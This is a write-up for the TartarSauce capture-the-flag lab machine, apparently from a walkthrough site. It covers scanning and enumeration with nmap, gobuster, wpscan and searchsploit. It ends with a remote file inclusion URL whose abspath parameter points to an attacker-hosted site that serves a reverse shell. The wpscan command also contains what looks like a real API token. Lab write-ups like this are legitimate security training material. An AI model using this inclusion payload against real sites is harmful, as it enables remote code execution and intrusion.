Scanning and Enumeration

Scanning

kali@kali:~$ nmap -p 80 -sC -sV 10.10.10.88
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-29 09:25 EDT
Nmap scan report for 10.10.10.88
Host is up (0.083s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds

Enumeration

Attempted password

attempted password of admin/admin

Found wp directory

kali@kali:~$ gobuster dir --url http://10.10.10.88/webservices --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.88/webservices
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/29 10:16:55 Starting gobuster
===============================================================
/wp (Status: 301)

WPScan

wpscan --url http://10.10.10.88:80/webservices/wp -e ap --plugins-detection aggressive --api-token lR1w5xltvpE1IsseAMKxxrMm6gpfyfef1SRLaR7peAs

After conducting the scan, a found plugin was the gwolle-gb plugin.

Running a searchsploit we are able to find a Remote File Inclusion Vulnerability.

kali@kali:~$ searchsploit gwolle
-------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                  |  Path
-------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion                 | php/webapps/38861.txt
-------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Further analyzation of the code looks like we need to create a reverse-shell and name it wp-load.php. After that we need to access it with the following link

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

Doing so should allow us to obtain a reverse shell.

PreviousTartarSauce NextExploitation

Last updated 5 years ago

Was this helpful?